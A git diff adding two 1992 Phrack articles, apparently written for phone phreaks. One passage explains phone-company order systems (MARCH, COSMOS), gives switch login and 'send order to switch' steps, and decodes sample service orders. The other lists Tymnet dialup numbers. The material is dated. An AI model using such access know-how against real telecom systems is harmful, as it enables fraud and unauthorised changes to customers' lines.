+     it to the Recent Change Message Generator (RCMG).
+
+(4)  RCMG performs all Recent Change message generation and, upon completion,
+     writes the order into a MARCH pending file (Pending Header or Review
+     file).
+
+     In addition to the data passed from SOAC, RCMG uses the following data in
+     MARCH to translate into switch-acceptable messages:
+
+          NXX                 Switch Specific Parameters (RPM)
+          USOC (RPM)          CCF Keywords (CFINIT)
+          USOC/NXX (RPM)      Review Triggers (RVT)
+                              Release Times (SRM)
+
+                      ________
+                     |        |
+                     |  SOAC  |
+                     |________|
+                          |
+                          |
+                          V
+                       ______
+                      |      |
+                      |  WM  |
+                      |______|
+                          |
+                          |
+*  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *
+*                              M  A  R  C  H                         *
+*   _______          _______          _________          ______      *
+*  |       |        |       |        |         |        |      |     *
+*  |  CIP  | -----> |  CTI  | -----> | TP TRANS| -----> | RCMG |     *
+*  |_______|        |_______|        |_________|        |______|     *
+*                       |                /\                          *
+*                       |                /                           *
+*                 ______|______         /                            *
+*                |             |       /                             *
+*                |    /TMP     |------/                              *
+*                |_____________|                                     *
+*                                                                    *
+*  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *
+
+  2. When MARCH Receives A Service Order Image
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(1)  A Service Order Image, passed from SOAC via Work Manager is received in
+     MARCH by the CIP, Communication Interface Program.
+
+(2)  When the image is received by the CIP, it calls up the CTI or Job Control
+     Module.  The Job Control Module or CTI writes the data that is received to
+     a temporary file and informs TP TRANS (Translation Translator) that an
+     order has been received.  It also controls the number of simultaneous jobs
+     submitted to TPTrans.
+
+(3)  TP TRANS analyzes the order in the temporary file, sees that it is a
+     service order image, and creates a SOI (Service Order Image) file using
+     the order number and file name.  The entire image is written to the SOI
+     file.  TP TRANS signals the Service Order Image Processor (SOIP) program
+     for the remaining processing.
+
+(4)  If SOIP can determine the switch for which the image is intended, it
+     passes a request to the Call COSMOS file and stores the image data in the
+     IH file (Image Header).  If SOIP cannot determine the switch, the image is
+     placed in the PAC (Unknown Switch Advisory) for manual processing.
+
+(5)  For images where the switch has been determined, MARCH calls COSMOS at its
+     next scheduled call time and runs RCP by Order Number (if the last call
+     time is past, it will defer the request to the first call time for the
+     next day).
+
+(6)  If the order is received from COSMOS, it is placed in the PH or RV file
+     appropriately and the Image Header is purged.  A flag is set indicating
+     that a Service Order Image text exists in the system.  If the order is not
+     received from COSMOS, the image is placed in the PAC for manual
+     processing.
+
+*  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *
+*                              M  A  R  C  H                         *
+*   _______          _______          _________          ______      *
+*  |       |        |       |        |         |        |      |     *
+*  |  CIP  | -----> |  CTI  | -----> | TP TRANS| -----> | RCMG |     *
+*  |_______|        |_______|        |_________|        |______|     *
+*                       |                /\   |                      *
+*                       |                /    |                      *
+*                 ______|______         /    _V___________           *
+*                |             |       /    |             |          *
+*                |    /TMP     |------/-----|    /SOI     |          *
+*                |_____________|            |_____________|          *
+*                                                                    *
+*  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *
+
+     It is not necessary for you to know all the programs MARCH uses to process
+Service Orders in a SOAC/MARCH environment.  That gets trivial and all stuck in
+various commands that do not mean anything unless, of course, one is on the
+system at hand.
+                        _________                             _________
+ ___________   TP      |         |  TP       _______   TP    |         |
+|           |------->  |   Work  | -------> |       | -----> |  SPCS/  |
+|    SOAC   | Image    | Manager |  Image   | MARCH | Image  | Digital |
+|___________|=======>  |   (WM)  | =======> |_______| =====> | Switch  |
+                       |_________|                           |_________|
+                         | |  ^ ^
+                         | |  | |
+                         | |  | |
+                         V V  | |
+                      * * * * * * * *
+                      *             *
+                      *   COSMOS    *
+                      *             *
+                      * * * * * * * *
+                         | |  | |
+                         | |__| |
+                         |______|
+
+     Though it is trivial to understand just how all these system work, here is
+a rough overview of MARCH.  To Cover MARCH, this will first cover the
+background processing.
+
+ F. MARCH Background Processing
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+RECENT CHANGE PARAMETER (RPM)
+
+  In conjunction with ORI Patterns and Recent Change Templates, the RPM
+  determines how information from SOAC is changed and/or manipulated to create
+  acceptable switch Recent Change messages.
+
+  RCMA Supervisor has overall responsibility for the RPM.  Although specific
+  categories may be maintained by Staff Manager, it is overviewed by RCMAC as a
+  whole.
+
+  This includes Line Class Code (LCC) conversion data previously under the sole
+  responsibility of the NAC in COSMOS.  It requires a change of procedures for
+  the RCMA to ensure proper LCC information is passed on the RPM and updated
+  appropriately.
+
+  Initial USOC is LCC conversion data and will be copied into MARCH from the
+  COSMOS USOC Table.
+
+SWITCH RELEASE MANAGER  (SDR)
+
+  With SOAC/MARCH, it no longer determines the types of orders to be pulled
+  from COSMOS, and thus establishes the date and time orders are to be released
+  to the switch, coming both from SOAC and from COSMOS.
+
+  It is based on Package Type (PKT) and Package Category (PKC)
+
+SWINIT TRANSACTION
+
+  Contains switch-specific data for MARCH to communicate with SOAC (via Work
+  Manager), COSMOS, and the switch.
+
+  Establishes the call times for COSMOS.
+
+   - RCP by Order Number for Service Order Images.
+   - Suspends, Restores, and Nonpayment Disconnects.
+   - Automated AGE Requests (as applicable).
+   - Automated MAN Report.
+
+SDR - SWITCH DATA REPORT
+
+  SDR is a report transaction intended for use by the RCMA Associate.
+
+  The Switch Data Report provides a printout of the SWINIT information that was
+  populated from the Perpetrations Questionnaire submitted by the RCMA
+  Supervisor (see Order Description part of this file).
+
+MOI of an Order in History
+
+  Orders in the History Header (HH) file will reflect the history source.  The
+  history source indicated how the order was written to the history file.
+
+ G. User Transaction in MARCH
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                       Most Commonly Used MARCH Commands
+
+.-------------------------------------------------------------------------.
+| Transaction |   Name       |  Function     | Search keys     | Prompts  |
+| ------------|--------------|---------------|-----------------|----------|
+| MSR <CR>    | MARCH Status |office status  |    . <CR>       |   ----   |
+|             |   Report     |               |   sw address    |          |
+| ------------|--------------|---------------|-----------------|----------|
+| MOI <CR>    | MARCH Order  | status of     |     fn rv       |   ----   |
+|             |  Inquiry     | order, tn,    |     fn rj       |          |
+|             |              | file          | fn hh/adt xx-xx |          |
+|             |              |               |  so n12345678   |          |
+|             |              |               |  tn xxxxxxx     |          |
+| ------------|--------------|---------------|-----------------|----------|
+| ONC <CR>    |   On Line    | Access COSMOS |      ------     | login    |
+|             |   COSMOS     |               |                 | password |
+| ------------|--------------|---------------|-----------------|----------|
+| ONS <CR>    |   On Line    | Access Switch |      ------     | Switch   |
+|             |    Switch    |               |                 | logon    |
+| ------------|--------------|---------------|-----------------|----------|
+| ORE <CR>    | Order Edit   | Edit Header or|      fn rv      |   ----   |
+|             |              |  message text |      fn rj      |          |
+|             |              |  of MARCH file|   so n12345678  |          |
+|             |              |               |   tn xxxxxxx    |          |
+| ------------|--------------|---------------|-----------------|----------|
+| ORE -G <CR> | Order Edit   | edit multiple | 2 Search keys   |   ----   |
+|             |  Global      |     files     |    Required     |          |
+| ------------|--------------|---------------|-----------------|----------|
+| ORI <CR>    | Order Input  |  Build MARCH  |      ------     | Patterns |
+|             |              |   file        |                 |          |
+| ------------|--------------|---------------|-----------------|----------|
+| ORS <CR>    |  Order Send  | Send to Switch|  so n12345678   |   ----   |
+|             |              |  immediately  |  tn xxxxxxx     |          |
+| ------------|--------------|---------------|-----------------|----------|
+| TLC <CR>    | Tail COSMOS  | watch MARCH   |      ------     |   ----   |
+|             |              | pull orders   |                 |          |
+| ------------|--------------|---------------|-----------------|----------|
+| TLS <CR>    | Tail Switch  | Watch orders  |      ______     |   ____   |
+|             |              | sent to switch|                 |          |
+| ------------|--------------|---------------|-----------------|----------|
+| VFY <CR>    | Verify       | Request Verify|      ------     | rltm,type|
+|             |              |               |                 | tn,oe,hml|
+| ------------|--------------|---------------|-----------------|----------|
+| VFD <CR>    | Verify       | Show Completed|      ------     |   ----   |
+|             | Display      | verifies      |                 |          |
+| ------------|--------------|---------------|-----------------|----------|
+| VFS <CR>    | Verify Status| Show pending  |      ------     |          |
+|             |              | verities      |                 |          |
+` ------------------------------------------------------------------------'
+
+Here is a detailed explanation of some of the commands:
+
+MOI - MARCH ORDER INQUIRY
+
+  MOI is a conversational inquiry transaction intended for use by the RCMAC
+  Clerk.
+
+  MOI is used to inquire on Recent Change messages in a pending file(s):
+  Pending Header, Review, Reject, and/or History Header.  It may be used to
+  inquire on one message, an entire order, several messages in more than one
+  file, or all orders in a file, determined by the search keys entered.
+
+ONS - ON line Switch
+
+  Each switch has its own login sequence.
+
+      DMS-100
+         Login
+         1) Give a Hard Break
+         2) At the "?" prompt type "login"
+         3) There will be an "Enter User Name" prompt.  Enter the user name.
+         4) Then "Enter Password" with a row of @, *, & and # covering the
+            password.
+         5) Once on, type "SERVORD" and you are on the RC channel of the
+            switch.
+
+         Logout
+         1) Type "LOGOUT" and CONTROL-P
+
+      1AESS
+         Login
+         1) Set Echo on, Line Feeds on and Caps Lock on.
+         2) End each VFY message with " . CONTROL-D" and each RC message with
+            "! CONTROL-D".
+
+         Logout
+         1) Hit CONTROL-P
+
+      5ESS
+         Login
+         1) Type "rcv:menu:apprc" at the "<" prompt.
+
+         Logout
+         1) Type "Q" and hit CONTROL-P
+
+ONC - On Line COSMOS
+
+  1) You will see "login:" so type in username and then there will be a
+     "Password:" prompt to enter password.
+
+ORE - Order Edit
+
+  ORE Commands are used to move between windows and to previous and subsequent
+  headers and text within an editing session.  Commands may be input at any
+  point in the ORE session regardless of the cursor location.  They are capital
+  letters requiring use of the shift key or control commands.  Here are the
+  movement commands:
+
+  Commands             Description
+  ~~~~~~~~             ~~~~~~~~~~~
+  N (ext header)       Replaces the data on the screen with the next header and
+                       associated text that matches the search keys entered.
+  M (ore text)         Replaces the data in the message text window with the
+                       next message associated with the existing header (for
+                       multiple text message).
+  P (revious header)   Replaces data in the header windows with the header you
+                       looked at previously (in the same editing session).
+  B (ackup text)       Replaces data in the message text window with the text
+                       you looked at previously (in the same editing session).
+  S (earch window)     Moves the cursor to the search window permitting
+                       additional search keys to be entered.
+  Control-D            Next Page
+  Control-U            Previous Page
+  <                    Move cursor from text window to header.
+  >                    Moves to text window from header.
+  Q (uit)              Quit
+
+ORE -G
+
+  ORE -G is a conversational transaction intended for use by the RCMA
+  associate.
+
+  ORE -G is used to globally edit Recent Change messages existing in a MARCH
+  pending file:  Pending Header, Review, and Reject.  Editing capabilities
+  include adding information on an order.
+
+  ORE -G is also used to change header information and to remove messages.
+
+ORI - ORder Input
+
+  ORder Input enables one to input an order and change orders.  The changes
+  that can be made are in the telephone number, OE, so on.  This command is too
+  complex to really get into here.
+
+VFY  - Verify
+
+  This is used to manually input verify messages into MARCH, thus to the
+  switches.
+
+MSR - MARCH Status Report
+
+  This used to count the amount of service orders stored in SOAC.  It also
+  shows the amount of change messages that have been sent to the switch.
+
+
+ H. Service Order Forms
+ ~~~~~~~~~~~~~~~~~~~~~~
+   In my time, I have come across a lot of printouts that have made no sense to
+me.  After several months, I could start to understand some of the codes.  Here
+are what some of the common service orders are and what they are for.
+
+SORD Service Order:
+ _________________________________________________________________
+|                                                                 |
+|                                                                 |
+|TN           CUS TD     DD     APT MAC ACC AO    CS  SLS     HU  |
+|415-343-8765 529 T      DUE    W           AS OF 1FR ABCDE4W     |
+|ORD       SU   EX     STA APP CD     IOP CT TX RA SP CON AC      |
+|C14327658      SMIUX      R              R                       |
+|ACNA  R                                                          |
+|WA    343# EXETER,SMT                                            |
+|WN    IDOL, BILLY                                                |
+|---S&E                                                           |
+|I1    ESL                                                        |
+|O1    1FR/TN 343-8321/ADL                                        |
+|      /PIC 10288                                                 |
+|O1    ESL/FN 3438321                                             |
+|---BILL                                                          |
+|MSN   IDOL, BILLY                                                |
+|MSTN  555-1212                                                   |
+|---RMKS                                                          |
+|RMK   BLAH                                                       |
+|                                                                 |
+|      /**** END                                                  |
+|                                                                 |
+|_________________________________________________________________|
+ _________________________________________________________________
+|                                                                 |
+|[1]          [2]       [3]                      [9]              |
+| |            |         |                        |               |
+|TN           CUS TD     DD     APT MAC ACC AO    CS  SLS     HU  |
+|407-343-8765 529 T      DUE    W           AS OF 1FR ABCDE4W     |
+|                                                                 |
+| [8]                                                             |
+|  |                                                              |
+| ORD       SU   EX     STA APP CD     IOP CT TX RA SP CON AC     |
+|C14327658      SMIUX      R              R                       |
+|ACNA  R                                                          |
+|                                                                 |
+|[4]                                                              |
+| |                                                               |
+|WA    343# EXETER,SMT                                            |
+|                                                                 |
+|[6]                                                              |
+| |                                                               |
+|WN    AT&T                                                       |
+|---S&E                      \                                    |
+|I1    ESL                   |                                    |
+|O1    1FR/TN 343-8321/ADL   | [5]                                |
+|      /PIC 10288            |                                    |
+|O1    ESL/FN 3438321        /                                    |
+|---BILL                                                          |
+|                                                                 |
+|  [6]                                                            |
+|   |                                                             |
+|  MSN   IDOL, BILLY                                              |
+|                                                                 |
+|  [7]                                                            |
+|   |                                                             |
+|  MSTN  555-1212                                                 |
+|---RMKS                                                          |
+|RMK   BLAH                                                       |
+|                                                                 |
+|      /**** END                                                  |
+|                                                                 |
+|_________________________________________________________________|
+
+[1]  Telephone Number.  Format is XXX-XXX-XXXX.
+[2]  Customer number.
+[3]  Due Date.
+[4]  Work Address.
+[5]  The S&E field:
+
+ACTION CODE -- This is the code at the far left-most side of the page.  These
+               codes end with a 1 or a 0.  The 1 says to add this feature and
+               the 0 says to not do the feature.  There are several different
+               action codes.  Here is a list:
+
+     Action Code     Used to
+     ~~~~~~~~~~~     ~~~~~~~
+     I               Add features
+     O               Remove features
+     C-T             Change designated number of rings, "forward to" number, or
+                     both on Busy/Delay call forwarding features.
+     E-D             Enter or Delete a feature for record purposes only.
+     R               Recap CCS USOC to advise
+
+
+Here is a list of some common USOCs (features):
+
+     ESC        Three Way Calling
+     ESF        Speed Calling
+     ESL        Speed Calling 8 Code
+     ESM        Call Forwarding
+     ESX        Call Waiting
+     EVB        Busy Call Forward
+     EVC        Bust Call Forward Extended
+     EVD        Delayed Call Forwarding
+     HM1        Intercom Plus
+     HMP        Intercom Plus
+     MVCCW      Commstar II Call Waiting
+
+[6] Billing name
+[7] Billing number
+[8] Service Order Number
+[9] Class of Service or LCC (See appendix 1)
+
+
+SDR File Header Information Order (MARCH)
+
+1.  Switchname                  7. Package Type
+2.  Header File Name            8. Package Category
+3.  Current Date & Time         9. Reject Reason
+4.  Service Order Number       10. Release Date & Time
+5.  Service Order Type         11. Accept Date & Time
+6.  Telephone Number               Reject Date & Time
+                               12. Input Source
+
+
+History Header File
+
+      [1]                    [2]                    [3]
+       |                      |                      |
+      sw: swad0             history header file     fri may 31 07:50:12 1992
+
+[4]-  so=janet3                   tn=         pkt-in     pkc=other
+[11]- act=05-30 0750   src=ori     |           |          |
+      history text=      |        [6]         [7]        [8]
+      rc:sclist:        [12]
+      ord 31235
+      cx =031235
+      adn 2
+      ! ~
+
+Reject File
+
+[1]-  sw:swad2       [2]- reject file   [3]- fri may 30 11:22:01 1992
+
+ [4]- so=c238          [5]- ver=7  tn=5551212  -[6]
+ [9]- rj reason=ot    rldt=05-30 1059   rjdt=05-30 :106 src=cosmos
+      message test=    |                 |               |
+      rc:line:chg:    [10]              [11]            [12]
+      ord 87102
+      "=238-7102'
+      "ord c231"
+      "restoration from ssv-db"
+      tn 555 1212
+      lcc 1mr
+      ! ~
+      ve data=
+        , er
+
+      m 07 rc18 0 87102 0 4 valar
+           new 00001605 err 00000307
+           05/30/92 11:07:16
+
+
+  I. COSMOS Service Order From The SOI Command
+  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ ________________________________________________________________________
+|WC%                                                                     |
+|WC% SOI                                                                 |
+|H ORD N73322444                                                         |
+|                                                                        |
+|             DEC 19, 1992   10:12:21 AM                                 |
+|           SERVICE ORDER ASSIGNMENT INQUIRY                             |
+|                                                                        |
+|ORD N733224444-A             OT(NC)      ST(AC- )      FACS(YES)        |
+|   DD(12-20-92) FDD(12-20-92) EST(11-16:14) SG(G)  DT(XX   ) OC(COR)    |
+|   MDF WORK REQ(YES) MDF COMPL(NO) LAC COMPL(NO) RCP(NO)                |
+|   WPN 9446 WLST 1= P  2=     3=     4=    5=    6=     7=    8=        |
+|   COORDINATION REQUIRED                                                |
+|   RMK   FAT TBCC,RO D77901070                                          |
+|   RMK   FAT TBCC,RO D77901070                                          |
+|CP  48-0942                                                             |
+|     ST SF   PC     FS WK   DATE 11-28-89   RZ 13                       |
+|     LOC PF01008                                                        |
+|OE 012-25-006                                                           |
+|     ST SF PC       FS WK   DATE 11-12-91   CZ 1MB    US 1MS    FEA TNNL|
+|     PIC 10288                                                          |
+|     LCC BB1                                                            |
+|     CCF   ESX                                                          |
+|     LOC PF01007                                                        |
+|TN   571-5425                                                           |
+|     ST WK  PD FS WK  DATE 12-03-91    TYPE X                           |
+|   **ORD D77901070-C       OT CD  ST AC-     DD 12-20-92  FDD 12-20-92  |
+|                                                                        |
+|** SOI COMPLEATED                                                       |
+|WC%                                                                     |
+|________________________________________________________________________|
+
+ ________________________________________________________________________
+|                                                                        |
+| WC%                                                                    |
+| WC% SOI                                                                |
+|                                                                        |
+|                                                                        |
+| H ORD N73322444                                                        |
+|                                                                        |
+|            [1]-  DEC 19, 1992   10:12:21 AM                            |
+|           [2]- SERVICE ORDER ASSIGNMNET INQUIRY                        |
+|                                                                        |
+| [3]                         [4]         [5]                            |
+|  |                           |           |                             |
+| ORD N733224444-A             OT(NC)      ST(AC- )      FACS(YES)       |
+|                                                                        |
+|    [7]          [8]           [6]           [9]                        |
+|     |            |             |             |                         |
+|    DD(12-20-92) FDD(12-20-92) EST(11-16:14) SG(G)  DT(XX   ) OC(COR)   |
+|                                                                        |
+|    [10]              [11]          [12]           [13]                 |
+|     |                 |             |              |                   |
+|    MDF WORK REQ(YES) MDF COMPL(NO) LAC COMPL(NO) RCP(NO)               |
+|                                                                        |
+|                                                                        |
+|    WPN 9446 WLST 1= P  2=     3=     4=    5=    6=     7=    8=       |
+|    COORDINATION REQUIRED                                               |
+|    RMK   FAT TBCC,RO D77901070                                         |
+|    RMK   FAT TBCC,RO D77901070                                         |
+|                                                                        |
+|[35]                                                                    |
+| |                                                                      |
+| CP  48-0942                                                            |
+|                                                                        |
+|     [34]           [35]     [36]           [37]                        |
+|      |              |        |              |                          |
+|      ST SF   PC     FS WK   DATE 11-28-89   RZ 13                      |
+|                                                                        |
+|      LOC PF01008  -[39]                                                |
+|                                                                        |
+| OE 012-25-006 -[19]                                                    |
+|                                                                        |
+|     [20]           [21]     [22]           [23]      [24]       [25]   |
+|      |              |        |              |         |          |     |
+|      ST SF PC       FS WK   DATE 11-12-91   CS 1MB    US 1MS   FEA TNNL|
+|                                                                        |
+|      PIC 10288                                                         |
+|                                                                        |
+|      LCC BB1 -[27]                                                     |
+|                                                                        |
+|      CCF   ESX -[26]                                                   |
+|                                                                        |
+|      LOC PF01007 -[32]                                                 |
+|                                                                        |
+| TN   571-5425  -[14]                                                   |
+|                                                                        |
+|     [15]      [16]     [17]            [18]                            |
+|      |         |        |               |                              |
+|      ST WK  PD FS WK  DATE 12-03-91    TYPE X                          |
+|                                                                        |
+|      [38]                 [28]   [29]        [30]         [31]         |
+|       |                    |      |           |            |           |
+|    **ORD D77901070-C       OT CD  ST AC-     DD 12-20-92  FDD 12-20-92 |
+|                                                                        |
+| ** SOI COMPLETED -[40]                                                 |
+|                                                                        |
+| WC%  -[41]                                                             |
+|________________________________________________________________________|
+
+[1] Date and Time the SOI was Requested in COSMOS
+[2] Title of Output Message
+[3] Order Number
+[4] Order Type
+[5] Status of Order
+[6] EST (11-16:14) When Service Order was Established into COSMOS
+[7] Due Date
+[8] Frame Due Date
+[9] Segment Group
+[10] Main Distributing Frame Work Required
+[11] Main Distributing Frame Work Complete
+[12] Loop Assignment Center Completed
+[13] FACS Y
+
+            >-- The order has downloaded from SOAC to MARCH(MARCH)
+     RCP N
+
+[14] Telephone Number
+[15] Present State of Telephone Number
+[16] Future Status of Telephone Number
+[17] Date of Last Activity on Telephone Number
+[18] Type of Telephone Number
+[19] Line Equipment
+[20] Present Status of Line Equipment
+[21] Future Status of Phone Line
+[22] Date of Last Activity on Line Equipment
+[23] Class of Service
+[24] USOC
+[25] Features
+[26] Custom Calling Feature
+[27] Line Class Code
+[28] Order Type that is Clearing Telephone Number
+[29] Status of Order that is Clearing Telephone Number
+[30] Due Date
+[31] Frame Due Date
+[32] Location of Line Equipment on Frame
+[33] Cable and Pair
+[34] Present Status of Cable and Pair
+[35] Future Status of Cable and Pair
+[36] Date of Last Activity on Cable and Pair
+[37] Resistance Zone
+[38] Order Number Clearing Cable
+[39] Location of Cable and Pair on Frame
+[40] SOI Complete Message
+[41] Wire Center and Prompt Symbol to Indicate Computer is Ready for Another
+     Transaction
+[42] Primary Independent Carrier is 10288 (AT&T's Ten Triple X Code)
+
+
+ J. MSR - MARCH Status Report (MARCH)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ _______________________________________________________________________
+|                                                                       |
+|  switch name                                                          |
+|                                                                       |
+|  ==================================================================== |
+|                         march status report                           |
+|      sw:switch name                    tue oct 30 11:14:48 1992       |
+|                       pending work functions                          |
+|  ==================================================================== |
+|                         past due         due today       future due   |
+|  ____________________________________________________________________ |
+|  use moi for:             0                0                  0       |
+|  reject file              0                1                270       |
+|  review file              0                0                  0       |
+|  held release status     28               14                 44       |
+|  normal release status    0                7                184       |
+|  ____________________________________________________________________ |
+|  use pac for:             0               15                          |
+|  change notices           0                3                          |
+|  unknown switch notices   0                0                          |
+|  =====================================================================|
+|                                                                       |
+|  ** msr completed                                                     |
+|_______________________________________________________________________|
+
+ _______________________________________________________________________
+|                                                                       |
+|  switch name                                                          |
+|                                                                       |
+|                                                                       |
+|  ==================================================================== |
+|         [1]                                                           |
+|          |              march status report                           |
+|      sw:switch name             [2]-   tue oct 30 11:14:48 1992       |
+|                       pending work functions                          |
+|  ==================================================================== |
+|                           [3]              [5]             [12]       |
+|                            |                |                |        |
+|                         past due         due today       future due   |
+|  ____________________________________________________________________ |
+|                                                                       |
+|  use moi for:             0                2 -[6]             0       |
+|                                                                       |
+|  reject file              0                1 -[7]             0       |
+|                                                                       |
+|  held release status      5 -[4]           6 -[8]             0       |
+|                                                                       |
+|  normal release status    0                3 -[9]             3 -[13] |
+|  ____________________________________________________________________ |
+|                                                                       |
+|  use pac for:             0               15  -[10]                   |
+|                                                                       |
+|  change notices           0                3 -[11]                    |
+|                                                                       |
+|  unknown switch notices   0                0                          |
+|  =====================================================================|
+|                                                                       |
+|  ** msr completed                                                     |
+|_______________________________________________________________________|
+
+[1] Office MSR request in (switch name/address)
+[2] Date and time of request
+[3] Past due service order column
+[4] Past due service order on hold
+[5] Due today service order column
+[6] Order due today in the reject file
+[7] Orders due today in review file
+[8] Orders due today on hold
+[9] Orders due today with a normal release status
+[10] PAC service orders which have been changed
+[11] PAC switch advisory notices encountered today
+[12] Future due service order column
+[13] Order due in the future with a normal release status
+
+
+ K. Other Notes
+ ~~~~~~~~~~~~~~
+     LCC or Line Class Code is, in short, what kind of line the Bell customer
+may have.  They are the phone line type ID.  These IDs are used by the SCC
+(Switching Control Center) and the switches as an ID to what type of billing
+you have.  Here is a list of some common LCCs that a standard BOC uses.
+Note:  This is not in stone.  These may change from area to area.
+
+1FR  - One Flat Rate
+1MR  - One Measured Rate
+1PC  - One Pay Phone
+CDF  - DTF Coin
+PBX  - Private Branch Exchange (Direct Inward Dialing ext.)
+CFD  - Coinless ANI7 Charge-a-Call
+INW  - InWATS
+OWT  - OutWATS
+PBM  - 0 HO/MO MSG REG (No ANI)
+PMB  - LTG = 1 HO/MO Regular ANI6
+
+
+ L. Recommended Reading
+ ~~~~~~~~~~~~~~~~~~~~~~
+Agent Steal's file in LODTJ #4
+Acronyms 1988 [from Metal Shop Private BBS] (Phrack 20, File 11)
+Lifting Ma Bell's Cloak Of Secrecy by VaxCat (Phrack 24, File 9)
diff --git a/phrack40/8.txt b/phrack40/8.txt
new file mode 100644
index 0000000..4fc1194
--- /dev/null
+++ b/phrack40/8.txt
@@ -0,0 +1,1032 @@
+                                ==Phrack Inc.==
+
+                     Volume Four, Issue Forty, File 8 of 14
+
+                       _________________________________
+                     ||                                 ||
+                     ||            BT Tymnet            ||
+                     ||         British Telecom         ||
+                     ||                                 ||
+                     ||           Part 1 of 3           ||
+                     ||                                 ||
+                     ||    Presented by Toucan Jones    ||
+                     ||                                 ||
+                     ||          August 1, 1992         ||
+                     ||_________________________________||
+
+
+  "We played an instrumental role in first recognizing that they were there."
+
+                 "If you mess with our network and we catch you
+                 -- which we always do -- you will go down."
+
+        -- John Guinasso, director of global network security for Tymnet parent
+           BT North America in Information Week (July 13, 1992, Page 15).
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                               Welcome to Tymnet!
+
+
+PART 1
+ A. BT Tymnet Access Location Index
+ B. BT-GNS Access Within Regional Bell Operating Companies
+  1. Bell Atlantic
+  2. BellSouth
+  3. Pacific Bell
+  4. Southwestern Bell
+  5. Southern New England Telephone
+ C. Database or Timesharing Companies on Tymnet
+ D. Service Classifications For Database or Timesharing Companies Using Tymnet
+ E. Summary of Global Network Services By Country
+ F. Terminal Identifiers
+ G. Login Options
+
+PART 2
+ H. BT-GNS Worldwide Asynchronus Outdial Service
+
+PART 3
+ I. BT-GNS Worldwide Access Sorted By Node
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ A. BT Tymnet Access Location Index
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     Country               Abbrev.      Country               Abbrev.
+     ---------------       -------      ---------------       -------
+      ANTIGUA                ATG         HONG KONG              HKG 
+      ARGENTINA              ARG         ISREAL                 ISR 
+      AUSTRALIA              AUS         ITALY                  ITA 
+      AUSTRIA                AUT         JAMAICA                JAM 
+      BAHAMAS                BHS         JAPAN                  JPN 
+      BAHRAIN                BHR         KOREA                  KOR 
+      BARBADOS               BRB         NETHERLANDS            NLD 
+      BELGIUM                BEL         NORTHERN MARIANAS      SAP 
+      BERMUDA                BMU         PANAMA                 PAN 
+      CANADA                 CAN         PERU                   PER 
+      CAYMAN ISLANDS         CAY         PHILIPPINES            PHL 
+      COLUMBIA               COL         PURERTO RICO           PRI 
+      DENMARK                DNK         SWEDEN                 SWE 
+      DOMINICAN RPUBLIC      DOM         SWITZERLAND            CHE 
+      EGYPT                  EGY         TRINIDAD AND TOBAGO    TTO 
+      FRANCE                 FRA         UNITED KINGDOM         GBR 
+      GREECE                 CRC         URUGUAY                URY 
+      GUAM                   GUM         USA                    USA 
+      GUATEMALA              GTM         VIRGIN ISLANDS         VIR 
+      HONDURAS               HND         WEST GERMANY           DDR 
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ B. BT-GNS Access Within Regional Bell Operating Companies
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+TYMNET has gateways into many of the Regional Bell Operating Companies' packet
+networks.  For specifics on how to access these networks, please refer to the
+information listed at the end of this listing.
+
+                                         DIALUP ACCESS            M
+                          PROV             100's bps              N
+NODE  CITY                 ST CNTRY DENS  3 12 24 96 ACCESS NO.   P COMMENTS
+----- -------------------- -- ----- ----  ---------- ------------ - --------
+02275 Birmingham           AL  USA  MED   B B  C     205/822-8629 N @PLSK
+03306 Berkeley             CA  USA  MED   B B        510/548-2121 N @PPS
+03306 Berkeley             CA  USA  MED        C     510/548-5743 N @PPS
+06272 El Segundo           CA  USA  MED   B B        310/640-8548 N @PPS
+06272 El Segundo           CA  USA  MED        C     310/640-0350 N @PPS
+06272 Fullerton            CA  USA  MED   B B        714-441-2777 N @PPS
+06272 Fullerton            CA  USA  MED        C     714/441-1839 N @PPS
+06272 Inglewood            CA  USA  MED   B B        310/216-7667 N @PPS
+06272 Inglewood            CA  USA  MED        C     310/216-4469 N @PPS
+06272 Los Angeles          CA  USA  MED   B B        213/480-1677 N @PPS
+06272 Los Angeles-Downtn.  CA  USA  MED   B B        213/687-3727 N @PPS
+03306 Mountain View        CA  USA  MED   B B        415/960-3363 N @PPS
+03306 Mountain View        CA  USA  MED        C     415/961-2102 N @PPS
+03306 Oakland              CA  USA  MED   B B  C     510/893-9889 N @PPS
+03306 Palo Alto            CA  USA  MED   B B        415/325-4666 N @PPS
+03306 Palo Alto            CA  USA  MED        C     415/323-2019 N @PPS
+06272 Pasadena             CA  USA  MED   B B        818-356-0780 N @PPS
+06272 Pasadena             CA  USA  MED        C     818/356-0487 N @PPS
+03306 San Francisco        CA  USA  MED   B B        415/362-2280 N @PPS
+03306 San Francisco        CA  USA  MED   B B  C     415/543-8275 N @PPS
+03306 San Francisco        CA  USA  MED   B B        415/626-5380 N @PPS
+03306 San Francisco        CA  USA  MED   B B  C     415/626-7477 N @PPS
+03306 San Francisco        CA  USA  MED        C     415/362-7579 N @PPS
+03306 San Jose             CA  USA  MED   B B        408-920-0888 N @PPS
+03306 San Jose             CA  USA  MED        C     408/298-0584 N @PPS
+06272 Santa Ana            CA  USA  MED   B B        714-972-9844 N @PPS
+06272 Santa Ana            CA  USA  MED        C     714/972-2314 N @PPS
+06272 Van Nuys             CA  USA  MED   B B        818-780-1066 N @PPS
+06272 Van Nuys             CA  USA  MED        C     818/780-5468 N @PPS
+02727 Bridgeport           CT  USA  MED   B B  C     203/366-6972 N @CONNNET
